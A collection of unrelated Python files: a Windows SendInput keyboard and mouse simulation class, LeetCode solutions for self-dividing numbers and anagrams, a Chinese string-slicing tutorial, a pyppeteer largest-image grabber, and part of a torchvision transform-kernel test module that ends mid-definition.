"SEMICOLON": 0xBA, "SEM": 0xBA,
"APOSTROPHE": 0xDE, "APO": 0xDE,
"GRAVE": 0xC0, "GRA": 0xC0,
"BACKSLASH": 0xDC, "BSL": 0xDC,
"COMMA": 0xBC, "COM": 0xBC,
"PERIOD": 0xBE, "PER": 0xBE,
"SLASH": 0xBF, "SLA": 0xBF,
}
# setup object
def __init__(self, common = None):
self.keys_worker = KeysWorker(self)
# Thread(target=self.keys_worker.processQueue).start()
self.common = common
if common is None:
self.standalone = True
# parses keys string and adds keys to the queue
def parseKeyString(self, string):
# print keys
if not self.standalone:
self.common.info("Processing keys: %s" % string)
key_queue = []
errors = []
# defaults to direct keys
key_type = self.direct_keys
# split by comma
keys = string.upper().split(",")
# translate
for key in keys:
# up, down or stroke?
up = True
down = True
direction = key.split("_")
subkey = direction[0]
if len(direction) >= 2:
if direction[1] == 'UP':
down = False
else:
up = False
# switch to virtual keys
if subkey == "VK":
key_type = self.virtual_keys
# switch to direct keys
elif subkey == "DK":
key_type = self.direct_keys
# key code
elif subkey.startswith("0x"):
subkey = int(subkey, 16)
if subkey > 0 and subkey < 256:
key_queue.append({
"key": int(subkey),
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
else:
errors.append(key)
# pause
elif subkey.startswith("-"):
time = float(subkey.replace("-", ""))/1000
if time > 0 and time <= 10:
key_queue.append({
"key": None,
"okey": "",
"time": time,
"up": False,
"down": False,
"type": None,
})
else:
errors.append(key)
# direct key
elif key_type == self.direct_keys and subkey in self.dk:
key_queue.append({
"key": self.dk[subkey],
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
# virtual key
elif key_type == self.virtual_keys and subkey in self.vk:
key_queue.append({
"key": self.vk[subkey],
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
# no match?
else:
errors.append(key)
# if there are errors, do not process keys
if len(errors):
return errors
# create new thread if there is no active one
if self.keys_process is None or not self.keys_process.isAlive():
self.keys_process = Thread(target=self.keys_worker.processQueue)
self.keys_process.start()
# add keys to queue
for i in key_queue:
self.keys_worker.key_queue.put(i)
self.keys_worker.key_queue.put(None)
return True
# direct key press
def directKey(self, key, direction = None, type = None):
if type is None:
type = self.direct_keys
if direction is None:
direction = self.key_press
if key.startswith("0x"):
key = int(key, 16)
else:
key = key.upper()
lookup_table = self.dk if type == self.direct_keys else self.vk
key = lookup_table[key] if key in lookup_table else 0x0000
self.keys_worker.sendKey(key, direction | type)
# direct mouse move or button press
def directMouse(self, dx = 0, dy = 0, buttons = 0):
self.keys_worker.sendMouse(dx, dy, buttons)
# threaded sending keys class
class KeysWorker():
# keys object
keys = None
# queue of keys
key_queue = Queue()
# init
def __init__(self, keys):
self.keys = keys
# main function, process key's queue in loop
def processQueue(self):
# endless loop
while True:
# get one key
key = self.key_queue.get()
# terminate process if queue is empty
if key is None:
self.key_queue.task_done()
if self.key_queue.empty():
return
continue
# print key
elif not self.keys.standalone:
self.keys.common.info("Key: \033[1;35m%s/%s\033[0;37m, duration: \033[1;35m%f\033[0;37m, direction: \033[1;35m%s\033[0;37m, type: \033[1;35m%s" % (
key["okey"] if key["okey"] else "None",
key["key"], key["time"],
"UP" if key["up"] and not key["down"] else "DOWN" if not key["up"] and key["down"] else "BOTH" if key["up"] and key["down"] else "NONE",
"None" if key["type"] is None else "DK" if key["type"] == self.keys.direct_keys else "VK"), "\033[0;35mKEY: \033[0;37m"
)
# if it's a key
if key["key"]:
# press
if key["down"]:
self.sendKey(key["key"], self.keys.key_press | key["type"])
# wait
sleep(key["time"])
# and release
if key["up"]:
self.sendKey(key["key"], self.keys.key_release | key["type"])
# not an actual key, just pause
else:
sleep(key["time"])
# mark as done (decrement internal queue counter)
self.key_queue.task_done()
# send key
def sendKey(self, key, type):
self.SendInput(self.Keyboard(key, type))
# send mouse
def sendMouse(self, dx, dy, buttons):
if dx != 0 or dy != 0:
buttons |= self.keys.mouse_move
self.SendInput(self.Mouse(buttons, dx, dy))
# send input
def SendInput(self, *inputs):
nInputs = len(inputs)
LPINPUT = INPUT * nInputs
pInputs = LPINPUT(*inputs)
cbSize = ctypes.c_int(ctypes.sizeof(INPUT))
return ctypes.windll.user32.SendInput(nInputs, pInputs, cbSize)
# get input object
def Input(self, structure):
if isinstance(structure, MOUSEINPUT):
return INPUT(0, _INPUTunion(mi=structure))
if isinstance(structure, KEYBDINPUT):
return INPUT(1, _INPUTunion(ki=structure))
if isinstance(structure, HARDWAREINPUT):
return INPUT(2, _INPUTunion(hi=structure))
raise TypeError('Cannot create INPUT structure!')
# mouse input
def MouseInput(self, flags, x, y, data):
return MOUSEINPUT(x, y, data, flags, 0, None)
# keyboard input
def KeybdInput(self, code, flags):
return KEYBDINPUT(code, code, flags, 0, None)
# hardware input
def HardwareInput(self, message, parameter):
return HARDWAREINPUT(message & 0xFFFFFFFF,
parameter & 0xFFFF,
parameter >> 16 & 0xFFFF)
# mouse object
def Mouse(self, flags, x=0, y=0, data=0):
return self.Input(self.MouseInput(flags, x, y, data))
# keyboard object
def Keyboard(self, code, flags=0):
return self.Input(self.KeybdInput(code, flags))
# hardware object
def Hardware(self, message, parameter=0):
return self.Input(self.HardwareInput(message, parameter))
# types
LONG = ctypes.c_long
DWORD = ctypes.c_ulong
ULONG_PTR = ctypes.POINTER(DWORD)
WORD = ctypes.c_ushort
class MOUSEINPUT(ctypes.Structure):
_fields_ = (('dx', LONG),
('dy', LONG),
('mouseData', DWORD),
('dwFlags', DWORD),
('time', DWORD),
('dwExtraInfo', ULONG_PTR))
class KEYBDINPUT(ctypes.Structure):
_fields_ = (('wVk', WORD),
('wScan', WORD),
('dwFlags', DWORD),
('time', DWORD),
('dwExtraInfo', ULONG_PTR))
class HARDWAREINPUT(ctypes.Structure):
_fields_ = (('uMsg', DWORD),
('wParamL', WORD),
('wParamH', WORD))
class _INPUTunion(ctypes.Union):
_fields_ = (('mi', MOUSEINPUT),
('ki', KEYBDINPUT),
('hi', HARDWAREINPUT))
class INPUT(ctypes.Structure):
_fields_ = (('type', DWORD),
('union', _INPUTunion))
#example:
if __name__ == '__main__':
sleep(3)
keys = Keys()
# mouse movement
for i in range(100):
keys.directMouse(-1*i, 0)
sleep(0.004)
# mouse keys
keys.directMouse(buttons=keys.mouse_rb_press)
sleep(0.5)
keys.directMouse(buttons=keys.mouse_lb_press)
sleep(2)
keys.directMouse(buttons=keys.mouse_lb_release)
sleep(0.5)
keys.directMouse(buttons=keys.mouse_rb_release)
# or
keys.directMouse(buttons=keys.mouse_lb_press | keys.mouse_rb_press)
sleep(2)
keys.directMouse(buttons=keys.mouse_lb_release | keys.mouse_rb_release)
# keyboard (direct keys)
keys.directKey("a")
sleep(0.04)
keys.directKey("a", keys.key_release)
# keyboard (virtual keys)
keys.directKey("a", type=keys.virtual_keys)
sleep(0.04)
keys.directKey("a", keys.key_release, keys.virtual_keys)
# queue of keys (direct keys, threaded, only for keybord input)
keys.parseKeyString("a_down,-4,a_up,0x01") # -4 - pause for 4 ms, 0x00 - hex code of Esc
# queue of keys (virtual keys, threaded, only for keybord input)
keys.parseKeyString("vk,a_down,-4,a_up") # -4 - pause for 4 ms
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
#
# A self-dividing number is a number that is divisible by every digit it contains.
# For example, 128 is a self-dividing number because 128 % 1 == 0, 128 % 2 == 0, and 128 % 8 == 0.
# Also, a self-dividing number is not allowed to contain the digit zero.
# Given a lower and upper number bound, output a list of every possible self dividing number,
# including the bounds if possible.
# Example 1:
# Input:
# left = 1, right = 22
# Output: [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 15, 22]
# Leetcode Weekly Contest 59.
class Solution(object):
def selfDividingNumbers(self, left, right):
"""
:type left: int
:type right: int
:rtype: List[int]
"""
def divide(divide_num, base=0):
if base == len(str(divide_num)):
return True
if divide_num < 10 and divide_num != 0:
return True
num = int(str(divide_num)[base])
if not num or divide_num % num:
return False
return divide(divide_num, base + 1)
ans = filter(divide, range(left, right + 1))
return list(ans)
# Elegant Solution
class Solution(object):
def selfDividingNumbers(self, left, right):
"""
:type left: int
:type right: int
:rtype: List[int]
"""
is_self_dividing = lambda num: '0' not in str(num) and all([num % int(i) == 0 for i in str(num)])
return list(filter(is_self_dividing, range(left, right + 1)))
if __name__ == '__main__':
print(Solution().selfDividingNumbers(1, 22))
print(Solution().selfDividingNumbers(0, 0))
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
s = 'spam'
# -------------------- 索引和分片 --------------------
# 索引 s[i] 获取指定偏移的元素
# 第一个元素偏移为0
# 最后一个元素偏移为-1
print('-' * 20, ' 索引和分片 ', '-' * 20)
print('索引s[1]:\n\t%s' % s[1])
print('索引s[2]:\n\t%s' % s[2])
print('索引s[-2]:\n\t%s' % s[-2])
print('负数索引+字符串长度=索引位置!\n')
# 分片 s[i: j] 提取指定偏移的字符串
# 为半开半闭区间 [i, j)
print('分片s[:]:\n\t%s\n' % s[:])
print('分片s[1:]:\n\t%s' % s[1:])
print('分片s[0: 2]:\n\t%s' % s[0: 2])
print('分片s[: 3]:\n\t%s' % s[: 3])
print('分片s[: -1]:\n\t%s' % s[: -1])
print('分片s[0: -1]:\n\t%s' % s[0: -1])
# 步进索引 s[i: j: k] 在[i, j)之间,每隔k个元素索引一次
a = '1234567890'
print('步进a[1: 10: 2]:\n\t%s' % a[1: 10: 2])
print('步进a[0: 10: 3]:\n\t%s' % a[0: 10: 3])
|
import logging
logger = logging.getLogger(__name__)
def grab_largest_image(url):
import asyncio
from pyppeteer import launch
async def main():
browser = None
try:
browser = await launch()
page = await browser.newPage()
logger.info(f"Opening page {url}")
await page.goto(url, timeout=10000)
max_img = await page.evaluate('''() => {
var images = document.getElementsByTagName('img')
var maxImg = null, maxArea=0, anchor;
for (var i=0, len=images.length; i<len; i++) {
img = images[i];
var imgArea = img.naturalWidth * img.naturalHeight;
if (imgArea > maxArea) {
maxArea = imgArea;
maxImg = img.src
}
}
if (maxImg) {
anchor = document.createElement('a');
anchor.href = maxImg;
return anchor.href; // return the absolute path
}
return maxImg
}''')
return max_img
except Exception as e:
logger.error(f"Error rendering page {url}")
pass
finally:
if browser:
await browser.close()
return asyncio.get_event_loop().run_until_complete(main())
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Solution(object):
def isAnagram(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
if len(s) != len(t):
return False
a = list(s)
a.sort()
b = list(t)
b.sort()
# print(a,b)
if a != b:
return False
else:
return True
x = Solution()
s1 = "anagram"
t1 = "nagaram"
print(x.isAnagram(s1, t1))
s2 = "rat"
t2 = "car"
print(x.isAnagram(s2, t2))
s3 = "aacc"
t3 = "ccac"
print(x.isAnagram(s3, t3))
|
import functools
import itertools
import numpy as np
import PIL.Image
import pytest
import torch.testing
import torchvision.ops
import torchvision.transforms.v2.functional as F
from torchvision import tv_tensors
from torchvision.transforms._functional_tensor import _max_value as get_max_value, _parse_pad_padding
from transforms_v2_legacy_utils import (
ArgsKwargs,
combinations_grid,
DEFAULT_PORTRAIT_SPATIAL_SIZE,
get_num_channels,
ImageLoader,
InfoBase,
make_bounding_box_loader,
make_bounding_box_loaders,
make_detection_mask_loader,
make_image_loader,
make_image_loaders,
make_image_loaders_for_interpolation,
make_mask_loaders,
make_video_loader,
make_video_loaders,
mark_framework_limitation,
TestMark,
)
__all__ = ["KernelInfo", "KERNEL_INFOS"]
class KernelInfo(InfoBase):
def __init__(
self,
kernel,
*,
# Defaults to `kernel.__name__`. Should be set if the function is exposed under a different name
# TODO: This can probably be removed after roll-out since we shouldn't have any aliasing then
kernel_name=None,
# Most common tests use these inputs to check the kernel. As such it should cover all valid code paths, but
# should not include extensive parameter combinations to keep to overall test count moderate.
sample_inputs_fn,
# This function should mirror the kernel. It should have the same signature as the `kernel` and as such also
# take tensors as inputs. Any conversion into another object type, e.g. PIL images or numpy arrays, should
# happen inside the function. It should return a tensor or to be more precise an object that can be compared to
# a tensor by `assert_close`. If omitted, no reference test will be performed.
reference_fn=None,
# These inputs are only used for the reference tests and thus can be comprehensive with regard to the parameter
# values to be tested. If not specified, `sample_inputs_fn` will be used.
reference_inputs_fn=None,
# If true-ish, triggers a test that checks the kernel for consistency between uint8 and float32 inputs with the
# reference inputs. This is usually used whenever we use a PIL kernel as reference.
# Can be a callable in which case it will be called with `other_args, kwargs`. It should return the same
# structure, but with adapted parameters. This is useful in case a parameter value is closely tied to the input
# dtype.
float32_vs_uint8=False,
# Some kernels don't have dispatchers that would handle logging the usage. Thus, the kernel has to do it
# manually. If set, triggers a test that makes sure this happens.
logs_usage=False,
# See InfoBase
test_marks=None,
# See InfoBase
closeness_kwargs=None,
):
super().__init__(id=kernel_name or kernel.__name__, test_marks=test_marks, closeness_kwargs=closeness_kwargs)
self.kernel = kernel
self.sample_inputs_fn = sample_inputs_fn
self.reference_fn = reference_fn
self.reference_inputs_fn = reference_inputs_fn
if float32_vs_uint8 and not callable(float32_vs_uint8):
float32_vs_uint8 = lambda other_args, kwargs: (other_args, kwargs) # noqa: E731
self.float32_vs_uint8 = float32_vs_uint8
self.logs_usage = logs_usage
def pixel_difference_closeness_kwargs(uint8_atol, *, dtype=torch.uint8, mae=False):
return dict(atol=uint8_atol / 255 * get_max_value(dtype), rtol=0, mae=mae)
def cuda_vs_cpu_pixel_difference(atol=1):
return {
(("TestKernels", "test_cuda_vs_cpu"), dtype, "cuda"): pixel_difference_closeness_kwargs(atol, dtype=dtype)
for dtype in [torch.uint8, torch.float32]
}
def pil_reference_pixel_difference(atol=1, mae=False):
return {
(("TestKernels", "test_against_reference"), torch.uint8, "cpu"): pixel_difference_closeness_kwargs(
atol, mae=mae
)
}
def float32_vs_uint8_pixel_difference(atol=1, mae=False):
return {
(
("TestKernels", "test_float32_vs_uint8"),
torch.float32,
"cpu",
): pixel_difference_closeness_kwargs(atol, dtype=torch.float32, mae=mae)
}
def scripted_vs_eager_float64_tolerances(device, atol=1e-6, rtol=1e-6):
return {
(("TestKernels", "test_scripted_vs_eager"), torch.float64, device): {"atol": atol, "rtol": rtol, "mae": False},
}
def pil_reference_wrapper(pil_kernel):
@functools.wraps(pil_kernel)
def wrapper(input_tensor, *other_args, **kwargs):
if input_tensor.dtype != torch.uint8:
raise pytest.UsageError(f"Can only test uint8 tensor images against PIL, but input is {input_tensor.dtype}")
if input_tensor.ndim > 3:
raise pytest.UsageError(
f"Can only test single tensor images against PIL, but input has shape {input_tensor.shape}"
)
input_pil = F.to_pil_image(input_tensor)
output_pil = pil_kernel(input_pil, *other_args, **kwargs)
if not isinstance(output_pil, PIL.Image.Image):
return output_pil
output_tensor = F.to_image(output_pil)
# 2D mask shenanigans
if output_tensor.ndim == 2 and input_tensor.ndim == 3:
output_tensor = output_tensor.unsqueeze(0)
elif output_tensor.ndim == 3 and input_tensor.ndim == 2:
output_tensor = output_tensor.squeeze(0)
return output_tensor
return wrapper
def xfail_jit(reason, *, condition=None):
return TestMark(("TestKernels", "test_scripted_vs_eager"), pytest.mark.xfail(reason=reason), condition=condition)
def xfail_jit_python_scalar_arg(name, *, reason=None):
return xfail_jit(
reason or f"Python scalar int or float for `{name}` is not supported when scripting",
condition=lambda args_kwargs: isinstance(args_kwargs.kwargs.get(name), (int, float)),
)
KERNEL_INFOS = []
def get_fills(*, num_channels, dtype):
yield None
int_value = get_max_value(dtype)
float_value = int_value / 2
yield int_value
yield float_value
for vector_type in [list, tuple]:
yield vector_type([int_value])
yield vector_type([float_value])
if num_channels > 1:
yield vector_type(float_value * c / 10 for c in range(num_channels))
yield vector_type(int_value if c % 2 == 0 else 0 for c in range(num_channels))
def float32_vs_uint8_fill_adapter(other_args, kwargs):
fill = kwargs.get("fill")
if fill is None:
return other_args, kwargs
if isinstance(fill, (int, float)):
fill /= 255
else:
fill = type(fill)(fill_ / 255 for fill_ in fill)
return other_args, dict(kwargs, fill=fill)
def reference_affine_bounding_boxes_helper(bounding_boxes, *, format, canvas_size, affine_matrix):
def transform(bbox, affine_matrix_, format_, canvas_size_):
# Go to float before converting to prevent precision loss in case of CXCYWH -> XYXY and W or H is 1
in_dtype = bbox.dtype
if not torch.is_floating_point(bbox):
bbox = bbox.float()
bbox_xyxy = F.convert_bounding_box_format(
bbox.as_subclass(torch.Tensor),
old_format=format_,
new_format=tv_tensors.BoundingBoxFormat.XYXY,
inplace=True,
)
points = np.array(
[
[bbox_xyxy[0].item(), bbox_xyxy[1].item(), 1.0],
[bbox_xyxy[2].item(), bbox_xyxy[1].item(), 1.0],
[bbox_xyxy[0].item(), bbox_xyxy[3].item(), 1.0],
[bbox_xyxy[2].item(), bbox_xyxy[3].item(), 1.0],
]
)
transformed_points = np.matmul(points, affine_matrix_.T)
out_bbox = torch.tensor(
[
np.min(transformed_points[:, 0]).item(),
np.min(transformed_points[:, 1]).item(),
np.max(transformed_points[:, 0]).item(),
np.max(transformed_points[:, 1]).item(),
],
dtype=bbox_xyxy.dtype,
)
out_bbox = F.convert_bounding_box_format(
out_bbox, old_format=tv_tensors.BoundingBoxFormat.XYXY, new_format=format_, inplace=True
)
# It is important to clamp before casting, especially for CXCYWH format, dtype=int64
out_bbox = F.clamp_bounding_boxes(out_bbox, format=format_, canvas_size=canvas_size_)
out_bbox = out_bbox.to(dtype=in_dtype)
return out_bbox
return torch.stack(
[transform(b, affine_matrix, format, canvas_size) for b in bounding_boxes.reshape(-1, 4).unbind()]
).reshape(bounding_boxes.shape)
def sample_inputs_convert_bounding_box_format():
formats = list(tv_tensors.BoundingBoxFormat)
for bounding_boxes_loader, new_format in itertools.product(make_bounding_box_loaders(formats=formats), formats):
yield ArgsKwargs(bounding_boxes_loader, old_format=bounding_boxes_loader.format, new_format=new_format)
def reference_convert_bounding_box_format(bounding_boxes, old_format, new_format):
return torchvision.ops.box_convert(
bounding_boxes, in_fmt=old_format.name.lower(), out_fmt=new_format.name.lower()
).to(bounding_boxes.dtype)
def reference_inputs_convert_bounding_box_format():
for args_kwargs in sample_inputs_convert_bounding_box_format():
if len(args_kwargs.args[0].shape) == 2:
yield args_kwargs
KERNEL_INFOS.append(
KernelInfo(
F.convert_bounding_box_format,
sample_inputs_fn=sample_inputs_convert_bounding_box_format,
reference_fn=reference_convert_bounding_box_format,
reference_inputs_fn=reference_inputs_convert_bounding_box_format,
logs_usage=True,
closeness_kwargs={
(("TestKernels", "test_against_reference"), torch.int64, "cpu"): dict(atol=1, rtol=0),
},
),
)
_RESIZED_CROP_PARAMS = combinations_grid(top=[-8, 9], left=[-8, 9], height=[12], width=[12], size=[(16, 18)])
def sample_inputs_resized_crop_image_tensor():
for image_loader in make_image_loaders():
yield ArgsKwargs(image_loader, **_RESIZED_CROP_PARAMS[0])
@pil_reference_wrapper
def reference_resized_crop_image_tensor(*args, **kwargs):
if not kwargs.pop("antialias", False) and kwargs.get("interpolation", F.InterpolationMode.BILINEAR) in {
F.InterpolationMode.BILINEAR,
F.InterpolationMode.BICUBIC,
}:
raise pytest.UsageError("Anti-aliasing is always active in PIL")
return F._resized_crop_image_pil(*args, **kwargs)
def reference_inputs_resized_crop_image_tensor():
for image_loader, interpolation, params in itertools.product(
make_image_loaders_for_interpolation(),
[
F.InterpolationMode.NEAREST,
F.InterpolationMode.NEAREST_EXACT,
F.InterpolationMode.BILINEAR,
F.InterpolationMode.BICUBIC,
],
_RESIZED_CROP_PARAMS,
):
yield ArgsKwargs(
image_loader,
interpolation=interpolation,
antialias=interpolation
in {
F.InterpolationMode.BILINEAR,
F.InterpolationMode.BICUBIC,
},
**params,
)
def sample_inputs_resized_crop_bounding_boxes():
for bounding_boxes_loader in make_bounding_box_loaders():
yield ArgsKwargs(bounding_boxes_loader, format=bounding_boxes_loader.format, **_RESIZED_CROP_PARAMS[0])
def sample_inputs_resized_crop_mask():
for mask_loader in make_mask_loaders():
yield ArgsKwargs(mask_loader, **_RESIZED_CROP_PARAMS[0])
def sample_inputs_resized_crop_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, **_RESIZED_CROP_PARAMS[0])
KERNEL_INFOS.extend(
[
KernelInfo(
F.resized_crop_image,
sample_inputs_fn=sample_inputs_resized_crop_image_tensor,
reference_fn=reference_resized_crop_image_tensor,
reference_inputs_fn=reference_inputs_resized_crop_image_tensor,
float32_vs_uint8=True,
closeness_kwargs={
**cuda_vs_cpu_pixel_difference(),
**pil_reference_pixel_difference(3, mae=True),
**float32_vs_uint8_pixel_difference(3, mae=True),
},
),
KernelInfo(
F.resized_crop_bounding_boxes,
sample_inputs_fn=sample_inputs_resized_crop_bounding_boxes,
),
KernelInfo(
F.resized_crop_mask,
sample_inputs_fn=sample_inputs_resized_crop_mask,
),
KernelInfo(
F.resized_crop_video,
sample_inputs_fn=sample_inputs_resized_crop_video,
closeness_kwargs=cuda_vs_cpu_pixel_difference(),
),
]
)
_PAD_PARAMS = combinations_grid(
padding=[[1], [1, 1], [1, 1, 2, 2]],
padding_mode=["constant", "symmetric", "edge", "reflect"],
)
def sample_inputs_pad_image_tensor():
make_pad_image_loaders = functools.partial(
make_image_loaders, sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], dtypes=[torch.float32]
)
for image_loader, padding in itertools.product(
make_pad_image_loaders(),
[1, (1,), (1, 2), (1, 2, 3, 4), [1], [1, 2], [1, 2, 3, 4]],
):
yield ArgsKwargs(image_loader, padding=padding)
for image_loader in make_pad_image_loaders():
for fill in get_fills(num_channels=image_loader.num_channels, dtype=image_loader.dtype):
yield ArgsKwargs(image_loader, padding=[1], fill=fill)
for image_loader, padding_mode in itertools.product(
# We branch for non-constant padding and integer inputs
make_pad_image_loaders(dtypes=[torch.uint8]),
["constant", "symmetric", "edge", "reflect"],
):
yield ArgsKwargs(image_loader, padding=[1], padding_mode=padding_mode)
# `torch.nn.functional.pad` does not support symmetric padding, and thus we have a custom implementation. Besides
# negative padding, this is already handled by the inputs above.
for image_loader in make_pad_image_loaders():
yield ArgsKwargs(image_loader, padding=[-1], padding_mode="symmetric")
def reference_inputs_pad_image_tensor():
for image_loader, params in itertools.product(
make_image_loaders(extra_dims=[()], dtypes=[torch.uint8]), _PAD_PARAMS
):
for fill in get_fills(
num_channels=image_loader.num_channels,
dtype=image_loader.dtype,
):
# FIXME: PIL kernel doesn't support sequences of length 1 if the number of channels is larger. Shouldn't it?
if isinstance(fill, (list, tuple)):
continue
yield ArgsKwargs(image_loader, fill=fill, **params)
def sample_inputs_pad_bounding_boxes():
for bounding_boxes_loader, padding in itertools.product(
make_bounding_box_loaders(), [1, (1,), (1, 2), (1, 2, 3, 4), [1], [1, 2], [1, 2, 3, 4]]
):
yield ArgsKwargs(
bounding_boxes_loader,
format=bounding_boxes_loader.format,
canvas_size=bounding_boxes_loader.canvas_size,
padding=padding,
padding_mode="constant",
)
def sample_inputs_pad_mask():
for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_categories=[10], num_objects=[5]):
yield ArgsKwargs(mask_loader, padding=[1])
def reference_inputs_pad_mask():
for mask_loader, fill, params in itertools.product(
make_mask_loaders(num_objects=[1], extra_dims=[()]), [None, 127], _PAD_PARAMS
):
yield ArgsKwargs(mask_loader, fill=fill, **params)
def sample_inputs_pad_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, padding=[1])
def reference_pad_bounding_boxes(bounding_boxes, *, format, canvas_size, padding, padding_mode):
left, right, top, bottom = _parse_pad_padding(padding)
affine_matrix = np.array(
[
[1, 0, left],
[0, 1, top],
],
dtype="float64" if bounding_boxes.dtype == torch.float64 else "float32",
)
height = canvas_size[0] + top + bottom
width = canvas_size[1] + left + right
expected_bboxes = reference_affine_bounding_boxes_helper(
bounding_boxes, format=format, canvas_size=(height, width), affine_matrix=affine_matrix
)
return expected_bboxes, (height, width)
def reference_inputs_pad_bounding_boxes():
for bounding_boxes_loader, padding in itertools.product(
make_bounding_box_loaders(extra_dims=((), (4,))), [1, (1,), (1, 2), (1, 2, 3, 4), [1], [1, 2], [1, 2, 3, 4]]
):
yield ArgsKwargs(
bounding_boxes_loader,
format=bounding_boxes_loader.format,
canvas_size=bounding_boxes_loader.canvas_size,
padding=padding,
padding_mode="constant",
)
def pad_xfail_jit_fill_condition(args_kwargs):
fill = args_kwargs.kwargs.get("fill")
if not isinstance(fill, (list, tuple)):
return False
elif isinstance(fill, tuple):
return True
else: # isinstance(fill, list):
return all(isinstance(f, int) for f in fill)
KERNEL_INFOS.extend(
[
KernelInfo(
F.pad_image,
sample_inputs_fn=sample_inputs_pad_image_tensor,
reference_fn=pil_reference_wrapper(F._pad_image_pil),
reference_inputs_fn=reference_inputs_pad_image_tensor,
float32_vs_uint8=float32_vs_uint8_fill_adapter,
closeness_kwargs=float32_vs_uint8_pixel_difference(),
test_marks=[
xfail_jit_python_scalar_arg("padding"),
xfail_jit(
"F.pad only supports vector fills for list of floats", condition=pad_xfail_jit_fill_condition
),
],
),
KernelInfo(
F.pad_bounding_boxes,
sample_inputs_fn=sample_inputs_pad_bounding_boxes,
reference_fn=reference_pad_bounding_boxes,
reference_inputs_fn=reference_inputs_pad_bounding_boxes,
test_marks=[
xfail_jit_python_scalar_arg("padding"),
],
),
KernelInfo(
F.pad_mask,
sample_inputs_fn=sample_inputs_pad_mask,
reference_fn=pil_reference_wrapper(F._pad_image_pil),
reference_inputs_fn=reference_inputs_pad_mask,
float32_vs_uint8=float32_vs_uint8_fill_adapter,
),
KernelInfo(
F.pad_video,
sample_inputs_fn=sample_inputs_pad_video,
),
]
)
_PERSPECTIVE_COEFFS = [
[1.2405, 0.1772, -6.9113, 0.0463, 1.251, -5.235, 0.00013, 0.0018],
[0.7366, -0.11724, 1.45775, -0.15012, 0.73406, 2.6019, -0.0072, -0.0063],
]
_STARTPOINTS = [[0, 1], [2, 3], [4, 5], [6, 7]]
_ENDPOINTS = [[9, 8], [7, 6], [5, 4], [3, 2]]
def sample_inputs_perspective_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
for fill in get_fills(num_channels=image_loader.num_channels, dtype=image_loader.dtype):
yield ArgsKwargs(
image_loader, startpoints=None, endpoints=None, fill=fill, coefficients=_PERSPECTIVE_COEFFS[0]
)
yield ArgsKwargs(make_image_loader(), startpoints=_STARTPOINTS, endpoints=_ENDPOINTS)
def reference_inputs_perspective_image_tensor():
for image_loader, coefficients, interpolation in itertools.product(
make_image_loaders_for_interpolation(),
_PERSPECTIVE_COEFFS,
[
F.InterpolationMode.NEAREST,
F.InterpolationMode.BILINEAR,
],
):
for fill in get_fills(num_channels=image_loader.num_channels, dtype=image_loader.dtype):
# FIXME: PIL kernel doesn't support sequences of length 1 if the number of channels is larger. Shouldn't it?
if isinstance(fill, (list, tuple)):
continue
yield ArgsKwargs(
image_loader,
startpoints=None,
endpoints=None,
interpolation=interpolation,
fill=fill,
coefficients=coefficients,
)
def sample_inputs_perspective_bounding_boxes():
for bounding_boxes_loader in make_bounding_box_loaders():
yield ArgsKwargs(
bounding_boxes_loader,
format=bounding_boxes_loader.format,
canvas_size=bounding_boxes_loader.canvas_size,
startpoints=None,
endpoints=None,
coefficients=_PERSPECTIVE_COEFFS[0],
)
format = tv_tensors.BoundingBoxFormat.XYXY
loader = make_bounding_box_loader(format=format)
yield ArgsKwargs(
loader, format=format, canvas_size=loader.canvas_size, startpoints=_STARTPOINTS, endpoints=_ENDPOINTS
)
def sample_inputs_perspective_mask():
for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
yield ArgsKwargs(mask_loader, startpoints=None, endpoints=None, coefficients=_PERSPECTIVE_COEFFS[0])
yield ArgsKwargs(make_detection_mask_loader(), startpoints=_STARTPOINTS, endpoints=_ENDPOINTS)
def reference_inputs_perspective_mask():
for mask_loader, perspective_coeffs in itertools.product(
make_mask_loaders(extra_dims=[()], num_objects=[1]), _PERSPECTIVE_COEFFS
):
yield ArgsKwargs(mask_loader, startpoints=None, endpoints=None, coefficients=perspective_coeffs)
def sample_inputs_perspective_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, startpoints=None, endpoints=None, coefficients=_PERSPECTIVE_COEFFS[0])
yield ArgsKwargs(make_video_loader(), startpoints=_STARTPOINTS, endpoints=_ENDPOINTS)
KERNEL_INFOS.extend(
[
KernelInfo(
F.perspective_image,
sample_inputs_fn=sample_inputs_perspective_image_tensor,
reference_fn=pil_reference_wrapper(F._perspective_image_pil),
reference_inputs_fn=reference_inputs_perspective_image_tensor,
float32_vs_uint8=float32_vs_uint8_fill_adapter,
closeness_kwargs={
**pil_reference_pixel_difference(2, mae=True),
**cuda_vs_cpu_pixel_difference(),
**float32_vs_uint8_pixel_difference(),
**scripted_vs_eager_float64_tolerances("cpu", atol=1e-5, rtol=1e-5),
**scripted_vs_eager_float64_tolerances("cuda", atol=1e-5, rtol=1e-5),
},
test_marks=[xfail_jit_python_scalar_arg("fill")],
),
KernelInfo(
F.perspective_bounding_boxes,
sample_inputs_fn=sample_inputs_perspective_bounding_boxes,
closeness_kwargs={
**scripted_vs_eager_float64_tolerances("cpu", atol=1e-6, rtol=1e-6),
**scripted_vs_eager_float64_tolerances("cuda", atol=1e-6, rtol=1e-6),
},
),
KernelInfo(
F.perspective_mask,
sample_inputs_fn=sample_inputs_perspective_mask,
reference_fn=pil_reference_wrapper(F._perspective_image_pil),
